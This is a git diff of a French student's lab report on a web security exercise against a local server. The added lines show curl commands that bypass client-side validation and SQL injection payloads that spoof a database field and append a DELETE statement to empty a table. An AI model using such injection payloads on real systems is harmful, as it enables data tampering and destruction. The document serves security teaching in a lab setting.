diff --git a/rendu.md b/rendu.md
index a64c4545a540865de5e308d6b384cd9d27bf9f61..ac5053a8eb92eafbd060d5b9afcacb4cb0a6c720 100644
--- a/rendu.md
+++ b/rendu.md
@@ -18,7 +18,11 @@ Il ne peut etre efficace que si on ne peut pas modifier la page du site ce qui e
 * Votre commande curl
 
 En utilisant curl j'ai utiliser la commandee suivante :  
->curl localhost:8080 --data-raw "chaine=Ma Chaine Evoyer par Curl /*-+ &submit=O  
+>curl localhost:8080 --data-raw "chaine=Ma Chaine Evoyer par Curl /*-+ &submit=O
+
+ou 
+
+> curl -X POST -F "chaine=Ma propre chaine ?" localhost:8080
 
 Cela a permit d'envoyer cette chaine de caractére sans passez par la validation du Script.  
 
@@ -28,9 +32,14 @@ Le script Js ne peut donc jammais trouver le chanp a vérifier.
 
 ## Question 3
 
-* Votre commande curl pour effacer la table
+* Réalisez une injection SQL qui insérer une chaine dans la base de données, tout en faisant en sorte que le champ who 
+* soit rempli avec ce que vous aurez décidé (et non pas votre adresse IP). Verifiez que cela a fonctionné ensuite.
+curl -X POST -F "chaine=Hey','8.8.8.8') #" localhost:8080
 
 * Expliquez comment obtenir des informations sur une autre table
+Si ici a la place de la chaine on ajoute une requette par exemple :
+curl -X POST -F "chaine=Drop','8.8.8.8'); DELETE chaine WHERE 1=1 #" localhost:8080
+
 
 ## Question 4